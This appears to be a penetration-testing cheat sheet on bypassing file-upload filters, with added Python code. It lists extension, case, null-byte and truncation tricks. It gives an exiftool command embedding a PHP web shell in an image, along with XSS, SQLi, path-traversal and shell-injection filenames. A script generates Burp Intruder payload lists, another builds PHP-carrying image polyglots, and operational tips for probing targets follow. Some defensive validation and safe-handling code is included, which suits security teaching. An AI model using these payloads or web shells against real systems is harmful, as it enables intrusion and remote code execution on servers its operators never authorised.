Name:
1. Use alternate extensions:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module, .phpt
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa (IIS <= 7.5), .cer, .shtml, .aspx;1.jpg (IIS < 7.0)
JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi, .pm, .lib
Erlang Yaws Web Server: .yaws
2. Random capitalization: PhP, pHp, …
3. Adding special characters before or after the extension (brute force with Burp):
%20, %0a, %00, %0d, /, \, ., …, ;, ./.\, \x00, file.php123png
Null-byte truncation (%00, \x00) only works on legacy stacks (PHP before 5.3.4, for example), and the .aspx;1.jpg form relies on old IIS path parsing, so test these against the target's actual server version.
4. Break limit: AA….AAA.php.png
Pad the name so that, when the server truncates it to its maximum filename length, the cut lands just after .php and the trailing image extension is lost.
5. Duplicate extension:
file.php.png.jpg
file.php%00.png
Content-Type:
Change from Content-Type: application/x-php to Content-Type: image/jpeg
More: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt
Magic byte:
List of file signature: https://en.wikipedia.org/wiki/List_of_file_signatures
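The filename tricks in items 1 to 5 above are usually fired from a Burp Intruder payload list. The script below is an added example (not from the original post) that builds such a list for one base name: alternate extensions, every case mix, the separator characters before and after the extension, the break-limit padding and the duplicate/null-byte forms. The extension and separator lists it uses are a constructed subset of the page's lists, and the 255-character limit is an assumption about the target.

```python
import itertools

# Constructed sample lists for this added example: a subset of the extensions listed above
# and the separator characters from technique 3 (percent-encoded where the page uses that form).
EXEC_EXTS = [".php", ".php5", ".phtml", ".phar"]
IMAGE_EXTS = [".png", ".jpg"]
SPECIALS = ["%20", "%0a", "%00", "%0d", "/", "\\", ".", ";"]


def case_variants(ext):
    """Technique 2: every upper/lower-case mix of an extension (.php -> .Php, .pHp, ...)."""
    letters = ext.lstrip(".")
    variants = []
    for combo in itertools.product((str.lower, str.upper), repeat=len(letters)):
        v = "." + "".join(f(c) for f, c in zip(combo, letters))
        if v not in variants:          # digits have no case, so skip duplicates (.php5)
            variants.append(v)
    return variants


def break_limit_name(ext, image_ext, limit=255):
    """Technique 4: pad the name so that truncating it to `limit` characters (255 is the
    usual filesystem limit; the real cut-off depends on the target, an assumption here)
    drops the trailing image extension and leaves the executable one in place."""
    return "A" * (limit - len(ext)) + ext + image_ext


def candidates(base="file", exec_exts=EXEC_EXTS, image_exts=IMAGE_EXTS, specials=SPECIALS):
    """Build the full candidate list for one base name, techniques 1-5 combined."""
    names = []
    for ext in exec_exts:
        names.append(base + ext)                                   # 1. alternate extension
        names.extend(base + v for v in case_variants(ext))         # 2. random capitalization
        for s in specials:                                          # 3. special chars around it
            names.append(base + ext + s)
            names.append(base + s + ext)
        for img in image_exts:
            names.append(break_limit_name(ext, img))                # 4. break limit
            names.append(base + ext + img)                          # 5. duplicate extension
            names.append(base + ext + "%00" + img)                  #    null-byte truncation
    seen = set()                                                    # dedupe, keep order
    return [n for n in names if not (n in seen or seen.add(n))]


if __name__ == "__main__":
    for name in candidates():
        print(name)      # paste into Burp Intruder as the payload list for `filename=`
```

Send each candidate in the multipart `filename=` field and sort the Intruder results by status code and response length; a 200 where the rest return 4xx is the one to inspect, and the stored name in the response (or a follow-up request to the upload path) tells you which normalisation the server applied.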
Exif:
exiftool -Comment='<?php system($_REQUEST["cmd"]); ?>' test.png
The image keeps its magic bytes and still opens as a picture, so it passes signature checks; the payload only runs if the server ends up executing the file as PHP (for example after one of the extension tricks above).
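The Content-Type, magic-byte and Exif sections all target the same weak check: an uploader that trusts the declared type and the first bytes of the body. The following added example (my code, not from the original post) builds the two attacker artefacts, a GIF89a-prefixed PHP file and a valid 1x1 PNG carrying the payload in a tEXt chunk (the PNG equivalent of the exiftool command), and runs them through a naive check and a hardened one. The signatures are the PNG/GIF/JPEG entries from the signature list linked above; the allowlist and the PHP open-tag markers are this example's own assumptions.

```python
import os
import struct
import zlib

# Signatures taken from the file-signature list linked above (only the three image types
# this example needs). Extension allowlist and PHP markers are this example's own choices.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\xff\xd8\xff": "image/jpeg",
}
ALLOWED = {".png": "image/png", ".gif": "image/gif", ".jpg": "image/jpeg", ".jpeg": "image/jpeg"}
PHP_MARKERS = (b"<?php", b"<?=")


def sniff(data):
    """Return the MIME type implied by the magic bytes, or None if no known signature."""
    for magic, mime in SIGNATURES.items():
        if data.startswith(magic):
            return mime
    return None


def make_polyglot(payload, magic=b"GIF89a"):
    """Attacker side: prepend a real image signature to a PHP payload. Magic-byte checks
    pass, and the PHP interpreter simply echoes the bytes before `<?php` as output."""
    return magic + b"\n" + payload


def _chunk(ctype, body):
    """One PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def png_with_comment(comment):
    """Attacker side: a valid 1x1 PNG whose tEXt chunk carries the comment, the PNG
    equivalent of `exiftool -Comment=... test.png`. Any decoder opens it as an image."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)        # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")              # filter byte + one pixel
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"tEXt", b"Comment\x00" + comment)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def naive_accept(filename, declared_type, data):
    """The check many uploaders ship: trust the Content-Type header and the first bytes.
    Both are attacker-controlled, so every artefact above passes."""
    return declared_type.startswith("image/") and sniff(data) is not None


def hardened_accept(filename, declared_type, data):
    """Extension allowlist; magic bytes must agree with the extension and with the declared
    type; body scanned for PHP open tags, because metadata can carry them too.
    The scan is a cheap heuristic. The robust fix is re-encoding the image with an image
    library and storing uploads where the web server never executes scripts."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        return False
    sniffed = sniff(data)
    if sniffed is None or sniffed != ALLOWED[ext] or declared_type != sniffed:
        return False
    return not any(marker in data for marker in PHP_MARKERS)
```

Note what the hardened check still does not do: it never proves the file is only an image. A PNG with the payload in a tEXt chunk is rejected here only because of the open-tag scan, and a payload split across chunks or encoded differently would slip past it. Re-encoding through an image library strips unknown chunks and metadata, and serving uploads from a non-executing location removes the impact even when a scripted file gets through.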
XSS:
<svg onload=alert(document.domain)>
Path Traversal
../../../file.png
SQLi
sleep(10)-- -.jpg
RCE
a`whoami`z.jpg
a$(whoami)x.jpg
a;sleep 30;z.jpg
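The XSS, path-traversal, SQLi and RCE names above only work when the application reuses the client's filename: in a rendered page, in a filesystem path, in a SQL string or in a shell command. The added example below (my code, not from the original post) shows the vulnerable shell pattern those RCE names exploit next to the server-side handling that neutralises all four classes: generate the stored name yourself and keep only an allowlisted extension, build the command as an argv list, bind the original name as a query parameter, and escape it for display. The upload directory and the allowlist are assumptions for the example.

```python
import html
import os
import re
import secrets
import sqlite3

ALLOWED_EXTS = {".png", ".jpg", ".jpeg", ".gif"}
UPLOAD_DIR = "/var/www/uploads"        # assumption: storage path the web server never executes


def server_side_name(user_filename):
    """Keep only the final extension of the client's name, and only if allowlisted; the stored
    name is generated here. `../../../file.png`, `a;sleep 30;z.jpg` and `sleep(10)-- -.jpg`
    all become <32 hex chars>.png/.jpg; `shell.php` and `<svg onload=...>` are rejected."""
    ext = os.path.splitext(user_filename)[1].lower()
    if ext not in ALLOWED_EXTS:
        return None
    return secrets.token_hex(16) + ext


def is_generated_name(name):
    """True if `name` has the shape server_side_name() produces."""
    return re.fullmatch(r"[0-9a-f]{32}\.(png|jpe?g|gif)", name) is not None


def thumbnail_command_unsafe(user_filename):
    """Vulnerable pattern: the raw upload name interpolated into a shell string. Passed to
    subprocess with shell=True, a`whoami`z.jpg or a$(whoami)x.jpg runs whoami."""
    return f"convert {UPLOAD_DIR}/{user_filename} -resize 100x100 {UPLOAD_DIR}/thumb_{user_filename}"


def thumbnail_command_safe(stored_name):
    """Hardened: argv list (no shell parses it) built from the server-generated name."""
    src = f"{UPLOAD_DIR}/{stored_name}"
    dst = f"{UPLOAD_DIR}/thumb_{stored_name}"
    return ["convert", src, "-resize", "100x100", dst]


def open_db():
    """In-memory SQLite table standing in for the app's upload metadata (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uploads (original_name TEXT, stored_name TEXT)")
    return conn


def record_upload(conn, original_name, stored_name):
    """The original name is kept for display only and bound as a parameter, so
    `sleep(10)-- -.jpg` is data, not SQL. Returns the name as stored."""
    conn.execute("INSERT INTO uploads (original_name, stored_name) VALUES (?, ?)",
                 (original_name, stored_name))
    row = conn.execute("SELECT original_name FROM uploads WHERE stored_name = ?",
                       (stored_name,)).fetchone()
    return row[0]


def display_name(original_name):
    """Escape before rendering: `<svg onload=alert(document.domain)>` becomes inert text."""
    return html.escape(original_name)
```

When testing a target, the thumbnail, antivirus or `file`/`exiftool` hook is the usual shell sink, so the `a;sleep 30;z.jpg` name is the quickest probe: a 30 second delay in the upload response is the signal, with no output required.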